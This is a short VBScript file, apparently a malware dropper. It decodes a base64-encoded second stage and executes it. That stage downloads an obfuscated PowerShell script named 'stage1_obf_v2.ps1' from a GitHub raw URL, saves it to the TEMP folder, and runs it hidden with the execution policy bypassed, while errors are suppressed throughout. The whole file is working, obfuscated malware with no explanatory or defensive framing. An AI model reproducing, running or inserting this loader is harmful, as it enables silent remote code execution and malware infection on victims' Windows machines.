On Error Resume Next
Dim d:Set d=CreateObject("MSXML2.DOMDocument.6.0")
Dim e:Set e=d.CreateElement("b64")
e.DataType="bin.base64"
e.Text="T24gRXJyb3IgUmVzdW1lIE5leHQKU2V0IHNoID0gQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikKU2V0IHhvID0gQ3JlYXRlT2JqZWN0KCJNU1hNTDIuU2VydmVyWE1MSFRUUC42LjAiKQp4by5PcGVuICJHRVQiLCAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3lhd2FyZ3VuZ3JpZWZlcnV2LWJlZXAvZGV2ZWxhbnRlL3JlZnMvaGVhZHMvbWFpbi9zdGFnZTFfb2JmX3YyLnBzMSIsIEZhbHNlCnhvLlNlbmQKSWYgeG8uU3RhdHVzIDw+IDIwMCBUaGVuIFdTY3JpcHQuUXVpdCAxClNldCBmc28gPSBDcmVhdGVPYmplY3QoIlNjcmlwdGluZy5GaWxlU3lzdGVtT2JqZWN0IikKcCA9IHNoLkV4cGFuZEVudmlyb25tZW50U3RyaW5ncygiJVRFTVAlIikgJiAiXHMxLnBzMSIKU2V0IGYgPSBmc28uQ3JlYXRlVGV4dEZpbGUocCwgVHJ1ZSwgRmFsc2UpCmYuV3JpdGUgeG8ucmVzcG9uc2VUZXh0CmYuQ2xvc2UKc2guUnVuICJwb3dlcnNoZWxsLmV4ZSAtbm9wIC13IGhpZGRlbiAtZXggYnlwYXNzIC1GaWxlICIiIiAmIHAgJiAiIiIiLCAwLCBGYWxzZQo="
Dim st:Set st=CreateObject("ADODB.Stream")
st.Type=1
st.Open
st.Write e.NodeTypedValue
st.Position=0
st.Type=2
st.CharSet="us-ascii"
Dim s:s=st.ReadText
st.Close
Execute s
